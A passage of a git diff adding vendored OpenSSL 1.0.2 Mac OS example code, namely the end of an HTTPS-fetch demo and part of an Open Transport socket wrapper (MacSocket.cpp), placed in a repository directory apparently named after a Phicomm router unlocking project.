+//	ssl_ctx = SSL_CTX_new(SSLv2_client_method());
+	ssl_ctx = SSL_CTX_new(SSLv23_client_method());
+//	ssl_ctx = SSL_CTX_new(SSLv3_client_method());
+			
+
+	//	Create an SSL thingey and try to negotiate the connection
+	
+	ssl = SSL_new(ssl_ctx);
+	
+	SSL_set_fd(ssl,theSocket);
+	
+	errCode = SSL_connect(ssl);
+	
+	if (errCode < 0)
+	{
+		SetErrorMessageAndLongIntAndBail("OpenSSL: Can't initiate SSL connection, SSL_connect() = ",errCode);
+	}
+	
+	//	Request the URI from the host
+	
+	CopyCStrToCStr("GET ",tempString,sizeof(tempString));
+	ConcatCStrToCStr(kHTTPS_URI,tempString,sizeof(tempString));
+	ConcatCStrToCStr(" HTTP/1.0\r\n\r\n",tempString,sizeof(tempString));
+
+	
+	errCode = SSL_write(ssl,tempString,CStrLength(tempString));
+	
+	if (errCode < 0)
+	{
+		SetErrorMessageAndLongIntAndBail("OpenSSL: Error writing data via ssl, SSL_write() = ",errCode);
+	}
+	
+
+	for (;;)
+	{
+	char	tempString[256];
+	int		bytesRead;
+		
+
+		//	Read some bytes and dump them to the console
+		
+		bytesRead = SSL_read(ssl,tempString,sizeof(tempString) - 1);
+		
+		if (bytesRead == 0 && MacSocket_RemoteEndIsClosing(theSocket))
+		{
+			break;
+		}
+		
+		else if (bytesRead < 0)
+		{
+			SetErrorMessageAndLongIntAndBail("OpenSSL: Error reading data via ssl, SSL_read() = ",bytesRead);
+		}
+		
+		
+		tempString[bytesRead] = '\0';
+		
+		printf("%s", tempString);
+	}
+	
+	printf("\n\n\n");
+	
+	//	All done!
+	
+	errCode = noErr;
+	
+	
+EXITPOINT:
+
+	//	Clean up and go home
+	
+	if (theSocket >= 0)
+	{
+		MacSocket_close(theSocket);
+	}
+	
+	if (ssl != nil)
+	{
+		SSL_free(ssl);
+	}
+	
+	if (ssl_ctx != nil)
+	{
+		SSL_CTX_free(ssl_ctx);
+	}
+	
+	
+	if (errCode != noErr)
+	{
+		printf("An error occurred:\n");
+		
+		printf("%s",GetErrorMessage());
+	}
+	
+	
+	MacSocket_Shutdown();
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.cpp
new file mode 100644
index 0000000..c95d804
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/GetHTTPS.src/MacSocket.cpp
@@ -0,0 +1,1607 @@
+/*
+ *	A simple socket-like package.  
+ *	This could undoubtedly be improved, since it does polling and busy-waiting.  
+ *	At least it uses asynch I/O and implements timeouts!
+ *
+ *	Other funkiness includes the use of my own (possibly brain-damaged) error-handling infrastructure.
+ *
+ *	-Roy Wood (roy@centricsystems.ca)
+ *
+ */
+
+
+/* ====================================================================
+ * Copyright (c) 1998-1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+ 
+
+
+
+
+#include "MacSocket.h"
+
+#include <Threads.h>
+
+#include <OpenTransport.h>
+#include <OpenTpTInternet.h>
+#include <OpenTptClient.h>
+
+
+
+#include "CPStringUtils.hpp"
+#include "ErrorHandling.hpp"
+
+
+//	#define MACSOCKET_DEBUG		1
+
+#ifdef MACSOCKET_DEBUG
+	#include <stdio.h>
+#endif
+
+
+
+extern int errno;
+
+
+#define kMaxNumSockets			4
+
+
+struct SocketStruct
+{
+	Boolean						mIsInUse;
+
+	Boolean						mEndpointIsBound;
+
+	Boolean						mLocalEndIsConnected;
+	Boolean						mRemoteEndIsConnected;
+
+	Boolean						mReceivedTOpenComplete;
+	Boolean						mReceivedTBindComplete;
+	Boolean						mReceivedTConnect;
+	Boolean						mReceivedTListen;
+	Boolean						mReceivedTPassCon;
+	Boolean						mReceivedTDisconnect;
+	Boolean						mReceivedTOrdRel;
+	Boolean						mReceivedTDisconnectComplete;
+	
+	long						mTimeoutTicks;
+	long						mOperationStartTicks;
+	
+	MacSocket_IdleWaitCallback	mIdleWaitCallback;
+	void						*mUserRefPtr;
+	
+	OTEventCode					mExpectedCode;
+	OTResult					mAsyncOperationResult;
+	
+	EndpointRef		 			mEndPointRef;
+	TBind						*mBindRequestedAddrInfo;
+	TBind						*mAssignedAddrInfo;
+	TCall						*mRemoteAddrInfo;
+	
+	Boolean						mReadyToReadData;
+	Boolean						mReadyToWriteData;
+	
+	Ptr							mReadBuffer;
+	Ptr							mWriteBuffer;
+	
+	int							mLastError;
+	char						mErrMessage[256];
+};
+
+typedef struct SocketStruct	SocketStruct;
+
+
+static SocketStruct			sSockets[kMaxNumSockets];
+static Boolean				sSocketsSetup = false;
+
+
+
+
+static OSErr MyBusyWait(SocketStruct *ioSocket,Boolean returnImmediatelyOnError,OTResult *outOTResult,Boolean *inAsyncOperationCompleteFlag);
+
+static pascal void OTNonYieldingNotifier(void *contextPtr,OTEventCode code,OTResult result,void *cookie);
+
+static Boolean	SocketIndexIsValid(const int inSocketNum);
+
+static void InitSocket(SocketStruct *ioSocket);
+
+static void PrepareForAsyncOperation(SocketStruct *ioSocket,const OTEventCode inExpectedCode);
+
+static Boolean TimeoutElapsed(const SocketStruct *inSocket);
+
+static OSStatus NegotiateIPReuseAddrOption(EndpointRef inEndpoint,const Boolean inEnableReuseIP);
+
+
+
+void MacSocket_GetSocketErrorInfo(const int inSocketNum,int *outSocketErrCode,char *outSocketErrString,const int inSocketErrStringMaxLength)
+{
+	if (outSocketErrCode != nil)
+	{
+		*outSocketErrCode = -1;
+	}
+	
+	if (outSocketErrString != nil)
+	{
+		CopyCStrToCStr("",outSocketErrString,inSocketErrStringMaxLength);
+	}
+	
+	
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+	
+		
+		if (outSocketErrCode != nil)
+		{
+			*outSocketErrCode = theSocketStruct->mLastError;
+		}
+
+		if (outSocketErrString != nil)
+		{
+			CopyCStrToCStr(theSocketStruct->mErrMessage,outSocketErrString,inSocketErrStringMaxLength);
+		}
+	}
+}
+
+
+void MacSocket_SetUserRefPtr(const int inSocketNum,void *inNewRefPtr)
+{
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+
+		theSocketStruct->mUserRefPtr = inNewRefPtr;
+	}
+}
+
+
+
+void MacSocket_GetLocalIPAndPort(const int inSocketNum,char *outIPAndPort,const int inIPAndPortLength)
+{
+	if (outIPAndPort != nil && SocketIndexIsValid(inSocketNum))
+	{
+	char			tempString[256];
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+	
+		
+		CopyCStrToCStr("",tempString,sizeof(tempString));
+
+		if (theSocketStruct->mAssignedAddrInfo != nil)
+		{
+		InetAddress		*theInetAddress = (InetAddress *) theSocketStruct->mAssignedAddrInfo->addr.buf;
+		InetHost		theInetHost = theInetAddress->fHost;
+			
+			if (theInetHost == 0)
+			{
+			InetInterfaceInfo	theInetInterfaceInfo;
+				
+				if (::OTInetGetInterfaceInfo(&theInetInterfaceInfo,kDefaultInetInterface) == noErr)
+				{
+					theInetHost = theInetInterfaceInfo.fAddress;
+				}
+			}
+		
+			::OTInetHostToString(theInetHost,tempString);
+			
+			ConcatCStrToCStr(":",tempString,sizeof(tempString));
+			ConcatLongIntToCStr(theInetAddress->fPort,tempString,sizeof(tempString));
+		}
+		
+		CopyCStrToCStr(tempString,outIPAndPort,inIPAndPortLength);
+	}
+}
+
+
+
+void MacSocket_GetRemoteIPAndPort(const int inSocketNum,char *outIPAndPort,const int inIPAndPortLength)
+{
+	if (outIPAndPort != nil && SocketIndexIsValid(inSocketNum))
+	{
+	char			tempString[256];
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+	
+		
+		CopyCStrToCStr("",tempString,sizeof(tempString));
+
+		if (theSocketStruct->mRemoteAddrInfo != nil)
+		{
+		InetAddress		*theInetAddress = (InetAddress *) theSocketStruct->mRemoteAddrInfo->addr.buf;
+		InetHost		theInetHost = theInetAddress->fHost;
+			
+			if (theInetHost == 0)
+			{
+			InetInterfaceInfo	theInetInterfaceInfo;
+				
+				if (::OTInetGetInterfaceInfo(&theInetInterfaceInfo,kDefaultInetInterface) == noErr)
+				{
+					theInetHost = theInetInterfaceInfo.fAddress;
+				}
+			}
+		
+			::OTInetHostToString(theInetHost,tempString);
+			
+			ConcatCStrToCStr(":",tempString,sizeof(tempString));
+			ConcatLongIntToCStr(theInetAddress->fPort,tempString,sizeof(tempString));
+		}
+		
+		CopyCStrToCStr(tempString,outIPAndPort,inIPAndPortLength);
+	}
+}
+
+
+
+Boolean MacSocket_RemoteEndIsClosing(const int inSocketNum)
+{
+Boolean		theResult = false;
+
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+
+		theResult = theSocketStruct->mReceivedTOrdRel;
+	}
+
+	return(theResult);
+}
+
+
+
+Boolean MacSocket_ListenCompleted(const int inSocketNum)
+{
+Boolean		theResult = false;
+
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+
+		theResult = theSocketStruct->mReceivedTPassCon;
+	}
+
+	return(theResult);
+}
+
+
+
+Boolean MacSocket_RemoteEndIsOpen(const int inSocketNum)
+{
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+	
+		return(theSocketStruct->mRemoteEndIsConnected);
+	}
+	
+	else
+	{
+		return(false);
+	}
+}
+
+
+
+Boolean MacSocket_LocalEndIsOpen(const int inSocketNum)
+{
+	if (SocketIndexIsValid(inSocketNum))
+	{
+	SocketStruct	*theSocketStruct = &(sSockets[inSocketNum]);
+	
+		return(theSocketStruct->mLocalEndIsConnected);
+	}
+	
+	else
+	{
+		return(false);
+	}
+}
+
+
+
+static Boolean TimeoutElapsed(const SocketStruct *inSocket)
+{
+Boolean		timeIsUp = false;
+
+	if (inSocket != nil && inSocket->mTimeoutTicks > 0 && ::TickCount() > inSocket->mOperationStartTicks + inSocket->mTimeoutTicks)
+	{
+		timeIsUp = true;
+	}
+	
+	
+	return(timeIsUp);
+}
+
+
+
+static Boolean SocketIndexIsValid(const int inSocketNum)
+{
+	if (inSocketNum >= 0 && inSocketNum < kMaxNumSockets && sSockets[inSocketNum].mEndPointRef != kOTInvalidEndpointRef)
+	{
+		return(true);
+	}
+	
+	else
+	{
+		return(false);
+	}
+}
+
+
+
+static void InitSocket(SocketStruct *ioSocket)
+{
+	ioSocket->mIsInUse = false;
+	
+	ioSocket->mEndpointIsBound = false;
+	
+	ioSocket->mLocalEndIsConnected = false;
+	ioSocket->mRemoteEndIsConnected = false;
+	
+	ioSocket->mReceivedTOpenComplete = false;
+	ioSocket->mReceivedTBindComplete = false;
+	ioSocket->mReceivedTConnect = false;
+	ioSocket->mReceivedTListen = false;
+	ioSocket->mReceivedTPassCon = false;
+	ioSocket->mReceivedTDisconnect = false;
+	ioSocket->mReceivedTOrdRel = false;
+	ioSocket->mReceivedTDisconnectComplete = false;
+	
+	ioSocket->mTimeoutTicks = 30 * 60;
+	ioSocket->mOperationStartTicks = -1;
+	
+	ioSocket->mIdleWaitCallback = nil;
+	ioSocket->mUserRefPtr = nil;
+	
+	ioSocket->mExpectedCode = 0;
+	ioSocket->mAsyncOperationResult = noErr;
+	
+	ioSocket->mEndPointRef = kOTInvalidEndpointRef;
+	
+	ioSocket->mBindRequestedAddrInfo = nil;
+	ioSocket->mAssignedAddrInfo = nil;
+	ioSocket->mRemoteAddrInfo = nil;
+	
+	ioSocket->mReadyToReadData = false;
+	ioSocket->mReadyToWriteData = true;
+	
+	ioSocket->mReadBuffer = nil;
+	ioSocket->mWriteBuffer = nil;
+
+	ioSocket->mLastError = noErr;
+	CopyCStrToCStr("",ioSocket->mErrMessage,sizeof(ioSocket->mErrMessage));
+}
+
+
+
+static void PrepareForAsyncOperation(SocketStruct *ioSocket,const OTEventCode inExpectedCode)
+{
+	ioSocket->mOperationStartTicks = ::TickCount();
+	
+	ioSocket->mAsyncOperationResult = noErr;
+	
+	ioSocket->mExpectedCode = inExpectedCode;
+}
+
+
+//	The wait function....
+
+static OSErr MyBusyWait(SocketStruct *ioSocket,Boolean returnImmediatelyOnError,OTResult *outOTResult,Boolean *inAsyncOperationCompleteFlag)
+{
+OSErr 		errCode = noErr;
+OTResult	theOTResult = noErr;
+
+	
+	SetErrorMessageAndBailIfNil(ioSocket,"MyBusyWait: Bad parameter, ioSocket = nil");
+	SetErrorMessageAndBailIfNil(inAsyncOperationCompleteFlag,"MyBusyWait: Bad parameter, inAsyncOperationCompleteFlag = nil");
+	
+	for (;;) 
+	{
+		if (*inAsyncOperationCompleteFlag)
+		{
+			theOTResult = ioSocket->mAsyncOperationResult;
+			
+			break;
+		}
+		
+		if (ioSocket->mIdleWaitCallback != nil)
+		{
+			theOTResult = (*(ioSocket->mIdleWaitCallback))(ioSocket->mUserRefPtr);
+			
+			if (theOTResult != noErr && returnImmediatelyOnError)
+			{
+				break;
+			}
+		}
+		
+		if (TimeoutElapsed(ioSocket))
+		{
+			theOTResult = kMacSocket_TimeoutErr;
+			
+			break;
+		}
+	}
+
+
+EXITPOINT:
+	
+	if (outOTResult != nil)
+	{
+		*outOTResult = theOTResult;
+	}
+	
+	return(errCode);
+}
+
+
+
+//	I used to do thread switching, but stopped.  It could easily be rolled back in though....
+
+static pascal void OTNonYieldingNotifier(void *contextPtr,OTEventCode code,OTResult result,void *cookie)
+{
+SocketStruct *theSocketStruct = (SocketStruct *) contextPtr;
+	
+	if (theSocketStruct != nil)
+	{
+		if (theSocketStruct->mExpectedCode != 0 && code == theSocketStruct->mExpectedCode)
+		{
+			theSocketStruct->mAsyncOperationResult = result;
+			
+			theSocketStruct->mExpectedCode = 0;
+		}
+		
+		
+		switch (code) 
+		{
+			case T_OPENCOMPLETE:
+			{
+				theSocketStruct->mReceivedTOpenComplete = true;
+				
+				theSocketStruct->mEndPointRef = (EndpointRef) cookie;
+				
+				break;
+			}
+
+			
+			case T_BINDCOMPLETE:
+			{
+				theSocketStruct->mReceivedTBindComplete = true;
+				
+				break;
+			}
+			
+
+			case T_CONNECT:
+			{
+				theSocketStruct->mReceivedTConnect = true;
+
+				theSocketStruct->mLocalEndIsConnected = true;
+				
+				theSocketStruct->mRemoteEndIsConnected = true;
+
+				break;
+			}
+			
+
+			case T_LISTEN:
+			{
+				theSocketStruct->mReceivedTListen = true;
+				
+				break;
+			}
+			
+
+			case T_PASSCON:
+			{
+				theSocketStruct->mReceivedTPassCon = true;
+				
+				theSocketStruct->mLocalEndIsConnected = true;
+				
+				theSocketStruct->mRemoteEndIsConnected = true;
+
+				break;
+			}
+
+
+			case T_DATA:
+			{
+				theSocketStruct->mReadyToReadData = true;
+				
+				break;
+			}
+			
+			case T_GODATA:
+			{
+				theSocketStruct->mReadyToWriteData = true;
+				
+				break;
+			}
+			
+			case T_DISCONNECT:
+			{
+				theSocketStruct->mReceivedTDisconnect = true;
+				
+				theSocketStruct->mRemoteEndIsConnected = false;
+				
+				theSocketStruct->mLocalEndIsConnected = false;
+				
+				::OTRcvDisconnect(theSocketStruct->mEndPointRef,nil);
+				
+				break;
+			}
+
+			case T_ORDREL:
+			{
+				theSocketStruct->mReceivedTOrdRel = true;
+				
+				//	We can still write data, so don't clear mRemoteEndIsConnected
+				
+				::OTRcvOrderlyDisconnect(theSocketStruct->mEndPointRef);
+				
+				break;
+			}
+			
+			case T_DISCONNECTCOMPLETE:
+			{
+				theSocketStruct->mReceivedTDisconnectComplete = true;
+				
+				theSocketStruct->mRemoteEndIsConnected = false;
+				
+				theSocketStruct->mLocalEndIsConnected = false;
+				
+				break;
+			}
+		}
+	}
+/*
+T_LISTEN OTListen
+T_CONNECT OTRcvConnect
+T_DATA OTRcv, OTRcvUData
+T_DISCONNECT OTRcvDisconnect
+T_ORDREL OTRcvOrderlyDisconnect
+T_GODATA OTSnd, OTSndUData, OTLook
+T_PASSCON none
+
+T_EXDATA OTRcv
+T_GOEXDATA OTSnd, OTLook
+T_UDERR OTRcvUDErr
+*/
+}
+
+
+
+//	Initialize the main socket data structure
+
+OSErr MacSocket_Startup(void)
+{
+	if (!sSocketsSetup)
+	{
+		for (int i = 0;i < kMaxNumSockets;i++)
+		{
+			InitSocket(&(sSockets[i]));
+		}
+
+		::InitOpenTransport();
+		
+		sSocketsSetup = true;
+	}
+	
+	
+	return(noErr);
+}
+
+
+
+//	Cleanup before exiting
+
+OSErr MacSocket_Shutdown(void)
+{
+	if (sSocketsSetup)
+	{
+		for (int i = 0;i < kMaxNumSockets;i++)
+		{
+		SocketStruct *theSocketStruct = &(sSockets[i]);
+		
+			if (theSocketStruct->mIsInUse)
+			{
+				if (theSocketStruct->mEndPointRef != kOTInvalidEndpointRef)
+				{
+				OTResult	theOTResult;
+				
+				
+					//	Since we're killing the endpoint, I don't bother to send the disconnect (sorry!)
+
+/*
+					if (theSocketStruct->mLocalEndIsConnected)
+					{
+						//	This is an abortive action, so we do a hard disconnect instead of an OTSndOrderlyDisconnect
+						
+						theOTResult = ::OTSndDisconnect(theSocketStruct->mEndPointRef, nil);
+						
+						//	Now we have to watch for T_DISCONNECTCOMPLETE event
+						
+						theSocketStruct->mLocalEndIsConnected = false;
+					}
+*/					
+					
+					theOTResult = ::OTCloseProvider(theSocketStruct->mEndPointRef);
+					
+					
+					theSocketStruct->mEndPointRef = kOTInvalidEndpointRef;
+				}
+				
+				if (theSocketStruct->mBindRequestedAddrInfo != nil)
+				{
+					::OTFree((void *) theSocketStruct->mBindRequestedAddrInfo,T_BIND);
+					
+					theSocketStruct->mBindRequestedAddrInfo = nil;
+				}
+				
+				if (theSocketStruct->mAssignedAddrInfo != nil)
+				{
+					::OTFree((void *) theSocketStruct->mAssignedAddrInfo,T_BIND);
+					
+					theSocketStruct->mAssignedAddrInfo = nil;
+				}
+				
+				if (theSocketStruct->mRemoteAddrInfo != nil)
+				{
+					::OTFree((void *) theSocketStruct->mRemoteAddrInfo,T_CALL);
+					
+					theSocketStruct->mRemoteAddrInfo = nil;
+				}
+				
+				
+			}
+		}
+		
+		::CloseOpenTransport();
+
+		sSocketsSetup = false;
+	}
+	
+	return(noErr);
+}
+
+
+
+
+
+
+//	Allocate a socket
+
+OSErr MacSocket_socket(int *outSocketNum,const Boolean inDoThreadSwitching,const long inTimeoutTicks,MacSocket_IdleWaitCallback inIdleWaitCallback,void *inUserRefPtr)
+{
+//	Gotta roll support back in for threads eventually.....
+
+#pragma unused(inDoThreadSwitching)
+
+
+OSErr	errCode = noErr;
+
+	
+	SetErrorMessageAndBailIfNil(outSocketNum,"MacSocket_socket: Bad parameter, outSocketNum == nil");
+	
+	*outSocketNum = -1;
+	
+	
+	//	Find an unused socket
+	
+	for (int i = 0;i < kMaxNumSockets;i++)
+	{
+		if (sSockets[i].mIsInUse == false)
+		{
+		OTResult		theOTResult;
+		SocketStruct	*theSocketStruct = &(sSockets[i]);
+		
+			
+			InitSocket(theSocketStruct);
+			
+			theSocketStruct->mIdleWaitCallback = inIdleWaitCallback;
+			theSocketStruct->mUserRefPtr = inUserRefPtr;
+			
+			theSocketStruct->mTimeoutTicks = inTimeoutTicks;
+			
+
+			//	Set up OT endpoint
+			
+			PrepareForAsyncOperation(theSocketStruct,T_OPENCOMPLETE);
+			
+			theOTResult = ::OTAsyncOpenEndpoint(OTCreateConfiguration(kTCPName),0,nil,OTNonYieldingNotifier,(void *) theSocketStruct);
+			
+			SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_socket: Can't create OT endpoint, OTAsyncOpenEndpoint() = ",theOTResult);
+			
+			BailIfError(MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTOpenComplete)));
+																						
+			SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_socket: Can't create OT endpoint, OTAsyncOpenEndpoint() = ",theOTResult);
+			
+			
+			*outSocketNum = i;
+			
+			errCode = noErr;
+			
+			theSocketStruct->mIsInUse = true;
+			
+			break;
+		}
+		
+		else if (i == kMaxNumSockets - 1)
+		{
+			SetErrorMessageAndBail("MacSocket_socket: No sockets available");
+		}
+	}
+
+
+EXITPOINT:
+	
+	errno = errCode;
+	
+	return(errCode);
+}
+
+
+
+
+OSErr MacSocket_listen(const int inSocketNum,const int inPortNum)
+{
+OSErr			errCode = noErr;
+SocketStruct	*theSocketStruct = nil;
+
+
+	if (!SocketIndexIsValid(inSocketNum))
+	{
+		SetErrorMessageAndBail("MacSocket_listen: Invalid socket number specified");
+	}
+
+
+	theSocketStruct = &(sSockets[inSocketNum]);
+
+
+OTResult		theOTResult;
+	
+	
+	if (theSocketStruct->mBindRequestedAddrInfo == nil)
+	{
+		theSocketStruct->mBindRequestedAddrInfo = (TBind *) ::OTAlloc(theSocketStruct->mEndPointRef,T_BIND,T_ADDR,&theOTResult);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't allocate OT T_BIND structure, OTAlloc() = ",theOTResult);
+		SetErrorMessageAndBailIfNil(theSocketStruct->mBindRequestedAddrInfo,"MacSocket_listen: Can't allocate OT T_BIND structure, OTAlloc() returned nil");
+	}
+	
+	if (theSocketStruct->mAssignedAddrInfo == nil)
+	{
+		theSocketStruct->mAssignedAddrInfo = (TBind *) ::OTAlloc(theSocketStruct->mEndPointRef,T_BIND,T_ADDR,&theOTResult);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't allocate OT T_BIND structure, OTAlloc() = ",theOTResult);
+		SetErrorMessageAndBailIfNil(theSocketStruct->mAssignedAddrInfo,"MacSocket_listen: Can't allocate OT T_BIND structure, OTAlloc() returned nil");
+	}
+	
+	if (theSocketStruct->mRemoteAddrInfo == nil)
+	{
+		theSocketStruct->mRemoteAddrInfo = (TCall *) ::OTAlloc(theSocketStruct->mEndPointRef,T_CALL,T_ADDR,&theOTResult);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't allocate OT T_CALL structure, OTAlloc() = ",theOTResult);
+		SetErrorMessageAndBailIfNil(theSocketStruct->mRemoteAddrInfo,"MacSocket_listen: Can't allocate OT T_CALL structure, OTAlloc() returned nil");
+	}
+	
+
+	if (!theSocketStruct->mEndpointIsBound)
+	{
+	InetInterfaceInfo	theInetInterfaceInfo;
+		
+		theOTResult = ::OTInetGetInterfaceInfo(&theInetInterfaceInfo,kDefaultInetInterface);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't determine OT interface info, OTInetGetInterfaceInfo() = ",theOTResult);
+
+
+	InetAddress	*theInetAddress = (InetAddress *) theSocketStruct->mBindRequestedAddrInfo->addr.buf;
+		
+//		theInetAddress->fAddressType = AF_INET;
+//		theInetAddress->fPort = inPortNum;
+//		theInetAddress->fHost = theInetInterfaceInfo.fAddress;
+		
+		::OTInitInetAddress(theInetAddress,inPortNum,theInetInterfaceInfo.fAddress);
+
+		theSocketStruct->mBindRequestedAddrInfo->addr.len = sizeof(InetAddress);
+		
+		theSocketStruct->mBindRequestedAddrInfo->qlen = 1;
+		
+		
+		theOTResult = ::OTSetSynchronous(theSocketStruct->mEndPointRef);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't set OT endpoint mode, OTSetSynchronous() = ",theOTResult);
+		
+		theOTResult = NegotiateIPReuseAddrOption(theSocketStruct->mEndPointRef,true);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't set OT IP address reuse flag, NegotiateIPReuseAddrOption() = ",theOTResult);
+		
+		theOTResult = ::OTSetAsynchronous(theSocketStruct->mEndPointRef);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't set OT endpoint mode, OTSetAsynchronous() = ",theOTResult);
+
+		
+		PrepareForAsyncOperation(theSocketStruct,T_BINDCOMPLETE);
+				
+		theOTResult = ::OTBind(theSocketStruct->mEndPointRef,theSocketStruct->mBindRequestedAddrInfo,theSocketStruct->mAssignedAddrInfo);
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't bind OT endpoint, OTBind() = ",theOTResult);
+		
+		BailIfError(MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTBindComplete)));
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't bind OT endpoint, OTBind() = ",theOTResult);
+		
+		
+		theSocketStruct->mEndpointIsBound = true;
+	}
+
+
+	PrepareForAsyncOperation(theSocketStruct,T_LISTEN);
+
+	theOTResult = ::OTListen(theSocketStruct->mEndPointRef,theSocketStruct->mRemoteAddrInfo);
+	
+	if (theOTResult == noErr)
+	{
+		PrepareForAsyncOperation(theSocketStruct,T_PASSCON);
+		
+		theOTResult = ::OTAccept(theSocketStruct->mEndPointRef,theSocketStruct->mEndPointRef,theSocketStruct->mRemoteAddrInfo);
+		
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't begin OT accept, OTAccept() = ",theOTResult);
+		
+		BailIfError(MyBusyWait(theSocketStruct,false,&theOTResult,&(theSocketStruct->mReceivedTPassCon)));
+																					
+		SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_listen: Can't accept OT connection, OTAccept() = ",theOTResult);
+	}
+	
+	else if (theOTResult == kOTNoDataErr)
+	{
+		theOTResult = noErr;
+	}
+	
+	else
+	{
+		SetErrorMessageAndLongIntAndBail("MacSocket_listen: Can't begin OT listen, OTListen() = ",theOTResult);
+	}
+
+
+	errCode = noErr;
+
+
+EXITPOINT:
+	
+	if (theSocketStruct != nil)
+	{
+		theSocketStruct->mLastError = noErr;
+		
+		CopyCStrToCStr("",theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+
+		if (errCode != noErr)
+		{
+			theSocketStruct->mLastError = errCode;
+			
+			CopyCStrToCStr(GetErrorMessage(),theSocketStruct->mErrMessage,sizeof(theSocketStruct->mErrMessage));
+		}
+	}
+	
+	errno = errCode;
+	
+	return(errCode);
+}
+
+
+
+
+OSErr MacSocket_connect(const int inSocketNum,char *inTargetAddressAndPort)
+{
+OSErr			errCode = noErr;
+SocketStruct	*theSocketStruct = nil;
+
+
+	if (!SocketIndexIsValid(inSocketNum))
+	{
+		SetErrorMessageAndBail("MacSocket_connect: Invalid socket number specified");
+	}
+
+	theSocketStruct = &(sSockets[inSocketNum]);
+
+	if (theSocketStruct->mEndpointIsBound)
+	{
+		SetErrorMessageAndBail("MacSocket_connect: Socket previously bound");
+	}
+
+	
+OTResult		theOTResult;
+
+	theSocketStruct->mBindRequestedAddrInfo = (TBind *) ::OTAlloc(theSocketStruct->mEndPointRef,T_BIND,T_ADDR,&theOTResult);
+																				
+	SetErrorMessageAndLongIntAndBailIfError(theOTResult,"MacSocket_connect: Can't allocate OT T_BIND structure, OTAlloc() = ",theOTResult);
+	SetErrorMessageAndBailIfNil(theSocketStruct->mBindRequestedAddrInfo,"MacSocket_connect: Can't allocate OT T_BIND structure, OTAlloc() returned nil");
+	
